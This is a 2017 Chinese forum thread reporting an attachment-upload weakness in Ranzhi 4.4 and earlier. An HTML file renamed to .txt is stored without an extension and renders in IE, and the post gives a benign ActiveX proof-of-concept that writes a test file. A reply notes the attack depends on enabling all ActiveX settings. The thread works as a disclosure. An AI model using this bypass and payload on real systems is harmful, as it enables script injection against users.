关于然之附件上传处文件检测
2017-08-09 09:04:56
杨桢
  • 访问次数: 45
  • 注册日期: 2017-06-29
  • 最后登录: 2017-08-21
  • 当前积分: 841
  • 门派等级: 无门派

通过本地测试然之开源4.4及之前的版本,然之在上传附件处,直接上传php文件时无法保存到服务器的;直接上传js文件,系统会自动编成txt文件,将内容直接输出为字符串,因此也无法运行。但是,我们可以制作一个html页面,里面包含js恶意代码,并将文件名后缀改为txt,之后上传,用ie打开(设置ActiveX控件和插件项,所有都启用)。用ie浏览刚才上传的附件,由于保存后的文件时无后缀名的,因此被视为网页文件解析,服务器就会执行里面的js代码。附件代码举例:


<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<script>
rs();
function rs(){
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var f1 = fso.createtextfile("hicking.txt",true);
    f1.Write ("This is a hicking test.");
    f1.Close();
    alert('注入文件!请查看桌面,是否已经生成一个hicking.txt文件');
}
</script>

杨桢 最后编辑, 2017-08-09 09:07:55
沙发
2017-08-09 10:47:35
王春生
  • 访问次数: 892
  • 注册日期: 2014-05-02
  • 最后登录: 2017-08-18
  • 当前积分: 1203
  • 门派等级: 无门派
设置ActiveX控件和插件项,所有都启用,这个打开,访问所有的网站都可以被挂马了。
1/1